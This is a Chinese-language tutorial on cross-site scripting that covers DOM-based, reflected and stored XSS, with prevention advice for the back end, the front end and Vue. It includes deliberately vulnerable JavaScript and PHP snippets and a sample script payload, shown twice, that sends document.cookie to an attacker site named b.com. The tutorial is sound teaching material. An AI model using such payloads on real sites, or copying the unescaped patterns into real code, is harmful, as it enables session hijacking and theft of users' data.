什么是XSS?

XSS，全称为Cross Site Scripting，意思是跨站脚本攻击，为了与层叠样式表（CSS：Cascading Style Sheets）区分，故其缩写改为XSS。

XSS攻击的原理是恶意攻击者在Web页面里插入恶意脚本，当用户浏览该页面时，嵌入的脚本代码会被执行，从而达到攻击目的。通常攻击者会通过XSS攻击来盗取用户隐私信息。

XSS漏洞分类

攻击者之所以有可乘之机，就是因为Web系统存在可以被XSS攻击利用的漏洞。XSS漏洞主要分为持久型XSS漏洞和非持久性XSS漏洞。

非持久性XSS漏洞是指 用于攻击的XSS脚本不会被后端持久化保存在服务器上或数据库里面，攻击方式也不止一种，比如DOM XSS漏洞、反射性漏洞等。

DOM XSS

DOM-based XSS漏洞是基于文档对象模型（DOM: Document Object Model)的一种漏洞，通常是通过url传入参数来控制触发的。比如网页上有这么一段javascript代码：

<script>
      document.write(location.href.substring(location.href.indexOf('default=') + 8));
</script>

这段代码的本意是：取出url里的default参数的值，然后显示到页面上。但这样会带来一个问题：如果default的值是一段包裹在script标签里的js代码，也会被加载执行。

基于这个漏洞，攻击者可以设计一个诱导用户点击的url：

http://www.a.com?default=<script>window.open("www.b.com?param="+document.cookie)</script>

一旦用户的浏览器打开了这个url，就会运行这行脚本：

window.open("www.b.com?param="+document.cookie)

也就是打开b.com网站，将用户的cookie信息发送到b.com。b.com就是攻击者搭建的网站，当b.com网站接收到该信息时，攻击者就盗取了用户的cookie信息。

反射性漏洞

DOM XSS漏洞的攻击是完全基于浏览器的，基于发射性漏洞的攻击还会经过后端，其攻击路径是：从浏览器到后端，再反射到浏览器上。

下面这个php代码的页面，就是一个反射性XSS攻击的演示。

<form action=''' method=''get'>
    <input type="text" name="xss"/>
    <input type="submit" value="test">
</form>
<?php
    $xss = @$_GET['xss'];
    if($xss !== null){
        echo $xss
    }
?>

这段代码中首先包含一个表单，提交表单向后端发送 GET 请求，带一个名为xss的参数。

PHP代码会读取xss参数，如果不为空，则直接打印出来。如果xss中存在 HTML 结构性的内容，打印之后会被浏览器直接渲染为 HTML 元素。

我们直接在表单输入框中输入一个js代码，比如<script>alert('hack')</script>。提交以后，会弹出一个对话框，我们被攻击了。

此时我们再来看下浏览器中的HTML代码，发现已经被注入了脚本。

为了防止出现非持久性XSS漏洞，尽量做到以下几点：

• 尽量不要从url，document.referrer，document.forms 中获取数据直接渲染。
• 尽量不要使用 eval(), document.write()，document.writeln()，element.innerHTML，document.createElement() 等有可能执行XSS代码的方法。
• 对涉及DOM渲染的方法传入的字符串参数做转义，也就是破坏HTML语法，目的是只做展示而不会执行任何脚本。

持久性XSS漏洞

持久性XSS漏洞一般存在于表单提交等交互功能，如发帖、留言、提交文本信息等，攻击者将用于攻击的内容经过正常提交，进入数据库持久化保存。当前端页面通过后端从数据库中读出注入的代码后，浏览器恰好将其渲染执行。

比如在某博客网站上发文章，文章中包括一段可执行的代码<script>window.open("www.b.com?param="+document.cookie)</script>，这样一来所有打开这篇文章的人的cookie信息都会被发送到b.com上。

持久性XSS漏洞被攻击有以下几个必要条件：

1. POST请求提交表单后端没做转义直接入库
2. 后端从数据库中取出数据没做转义直接输出给前端
3. 前端拿到后端数据没做转义直接渲染页面

防止出现持久性XSS漏洞，需要前后端的配合，要做到以下几点：

• 后端在数据入库时，不能相信任何前端数据，将所有的字段统一进行转义处理。
• 后端对返回给前端的数据统一进行转义处理。
• 前端在渲染页面的时候不能相信任何后端数据，任何字段都需要做转义处理。

它与SQL注入攻击类似，SQL注入攻击中以SQL语句作为用户输入，从而达到查询/修改/删除数据的目的，而在xss攻击中，通过插入恶意脚本，实现对用户游览器的控制，获取用户的一些信息。

与反射性攻击相比，持久性XSS漏洞攻击路径要更长：浏览器 -> 后端 -> 数据库 -> 后端 -> 浏览器。

总结

非持久型xss攻击是一次性的，仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接，用户访问该链接时，被植入的攻击脚本被用户浏览器执行，从而达到攻击目的。

非持久性XSS漏洞主要有以下几个特点：

• 不经过服务器储存
• 通常需要诱导用户点击恶意url
• 反馈率低，难以发现和修复

持久型xss攻击会把攻击者的数据存储在服务器端，攻击行为将伴随着攻击数据一直存在。

现在国内比较流行的前端开发框架是vue框架。如果使用vue框架来开发前端应用，那么要防止XSS攻击需要注意以下两点：

• 尽量使用插值表达式{{}}，它会把要显示的内容转为字符串。
• 如果使用v-html，要保证来自服务端的渲染数据都是安全的。